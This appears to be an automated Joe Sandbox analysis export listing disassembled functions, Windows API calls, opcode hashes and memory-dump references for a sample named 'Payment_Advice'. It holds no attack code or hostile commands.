                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 03bf940733d9f0fbf44504780eb2a3d9b52c9f0682f8858d84537a4fade24b23
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: 03bf940733d9f0fbf44504780eb2a3d9b52c9f0682f8858d84537a4fade24b23
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 9373bef018d65071d67d7ef5b5ebb5016fec6a7bf5398a2ca7c2f6a24891f4a8
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: 9373bef018d65071d67d7ef5b5ebb5016fec6a7bf5398a2ca7c2f6a24891f4a8
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 370edf4aaf6f82a2e96f4df348c10203cd8a1784495e52bc78df4be340762711
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: 370edf4aaf6f82a2e96f4df348c10203cd8a1784495e52bc78df4be340762711
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: b59226cb870e936fa62cef2bd984fe8c30d402c15f8ba13011dce40f8f430485
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: b59226cb870e936fa62cef2bd984fe8c30d402c15f8ba13011dce40f8f430485
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 885cc418ca517aaf2cbad8e265e16115afe6ae0799f2e64b6ee7d36ae8535b58
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: 885cc418ca517aaf2cbad8e265e16115afe6ae0799f2e64b6ee7d36ae8535b58
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: ff30fad593e77423895b6967cee273d220965a5e6d10499a6ad142224d4ac919
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: ff30fad593e77423895b6967cee273d220965a5e6d10499a6ad142224d4ac919
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: (Q
                                                                                                    • API String ID: 1269201914-982174220
                                                                                                    • Opcode ID: d08447de4e7e5e68831e1187495565395964c0e886b75b71078f8f7479416db1
                                                                                                    • Instruction ID: 8ab95022a30718df81679c212d389c7a848c6875c0d207833bff7e4f56c49c33
                                                                                                    • Opcode Fuzzy Hash: d08447de4e7e5e68831e1187495565395964c0e886b75b71078f8f7479416db1
                                                                                                    • Instruction Fuzzy Hash: B0A011E22A8002BC300822082C0BCBF0E0EE8C2F20330882EFC0280080BA800C820A30
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: (Q
                                                                                                    • API String ID: 1269201914-982174220
                                                                                                    • Opcode ID: 815a93af928843ec19d050e41f5af8d995f0e1b00ff27701814ae7547b87199f
                                                                                                    • Instruction ID: 8ab95022a30718df81679c212d389c7a848c6875c0d207833bff7e4f56c49c33
                                                                                                    • Opcode Fuzzy Hash: 815a93af928843ec19d050e41f5af8d995f0e1b00ff27701814ae7547b87199f
                                                                                                    • Instruction Fuzzy Hash: B0A011E22A8002BC300822082C0BCBF0E0EE8C2F20330882EFC0280080BA800C820A30
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: FvnQ
                                                                                                    • API String ID: 1269201914-3908200080
                                                                                                    • Opcode ID: 65a73a8bc9721c44062551dd930ce9aa2d77067c9ec56e47cc077dee8c9a3931
                                                                                                    • Instruction ID: 1c62238af3cc5210371a677249da51b77b969ce0968ae6386922513a2357f673
                                                                                                    • Opcode Fuzzy Hash: 65a73a8bc9721c44062551dd930ce9aa2d77067c9ec56e47cc077dee8c9a3931
                                                                                                    • Instruction Fuzzy Hash: 66A011E2AA82023C3008A2A02C0BCBB0E0EE8C0B223328A2EFC00A0080A88008820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: (Q
                                                                                                    • API String ID: 1269201914-982174220
                                                                                                    • Opcode ID: 456ece8ba80269568a3f7149f492ad1c9ed854d509cd83729f608ea2e86e5da9
                                                                                                    • Instruction ID: 8ab95022a30718df81679c212d389c7a848c6875c0d207833bff7e4f56c49c33
                                                                                                    • Opcode Fuzzy Hash: 456ece8ba80269568a3f7149f492ad1c9ed854d509cd83729f608ea2e86e5da9
                                                                                                    • Instruction Fuzzy Hash: B0A011E22A8002BC300822082C0BCBF0E0EE8C2F20330882EFC0280080BA800C820A30
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: FvnQ
                                                                                                    • API String ID: 1269201914-3908200080
                                                                                                    • Opcode ID: 0f9278c684b0b35415e01dc76a9371f18f9591a4f1c71bb89dd0735cd2532536
                                                                                                    • Instruction ID: a1e443488da4f566def488e846c691476abca60ec596aaf262e9a0f65edf05dc
                                                                                                    • Opcode Fuzzy Hash: 0f9278c684b0b35415e01dc76a9371f18f9591a4f1c71bb89dd0735cd2532536
                                                                                                    • Instruction Fuzzy Hash: A4A011E2AA8202BC3008A2A02C0BCBB0E0EE8C0B20332882EFC0280080A88008820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: FvnQ
                                                                                                    • API String ID: 1269201914-3908200080
                                                                                                    • Opcode ID: 6faf68ee7e84a3d76166ae59835c2040be45a0743a50633204ad3e522f431193
                                                                                                    • Instruction ID: a1e443488da4f566def488e846c691476abca60ec596aaf262e9a0f65edf05dc
                                                                                                    • Opcode Fuzzy Hash: 6faf68ee7e84a3d76166ae59835c2040be45a0743a50633204ad3e522f431193
                                                                                                    • Instruction Fuzzy Hash: A4A011E2AA8202BC3008A2A02C0BCBB0E0EE8C0B20332882EFC0280080A88008820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0052B7BB: GetOEMCP.KERNEL32(00000000,?,?,0052BA44,?), ref: 0052B7E6
                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0052BA89,?,00000000), ref: 0052BC64
                                                                                                    • GetCPInfo.KERNEL32(00000000,0052BA89,?,?,?,0052BA89,?,00000000), ref: 0052BC77
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CodeInfoPageValid
                                                                                                    • String ID:
                                                                                                    • API String ID: 546120528-0
                                                                                                    • Opcode ID: 47b639a062f6603b94904480b524ec938458398aec115ebbcf89963ea2c45b6d
                                                                                                    • Instruction ID: 662d84b7b1f757bfe914250ce890833fc9bddef97501b8a4ecdd42bb66f2178c
                                                                                                    • Opcode Fuzzy Hash: 47b639a062f6603b94904480b524ec938458398aec115ebbcf89963ea2c45b6d
                                                                                                    • Instruction Fuzzy Hash: 99513171A002669EFB208F75E8857FABFF4FF52300F18446ED4968B2D2D73499469B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00509A50,?,?,00000000,?,?,00508CBC,?), ref: 00509BAB
                                                                                                    • GetLastError.KERNEL32(?,00000000,00508411,-00009570,00000000,000007F3), ref: 00509BB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 741ecfec9c7512583525318a24fb502be92d4ec147d740ee3b2cd1d44bf256d2
                                                                                                    • Instruction ID: 2f19aa8b59a2eb47e0ca0c8aeb9f20b6adc43a349fbebb72f662312bfe0f25c7
                                                                                                    • Opcode Fuzzy Hash: 741ecfec9c7512583525318a24fb502be92d4ec147d740ee3b2cd1d44bf256d2
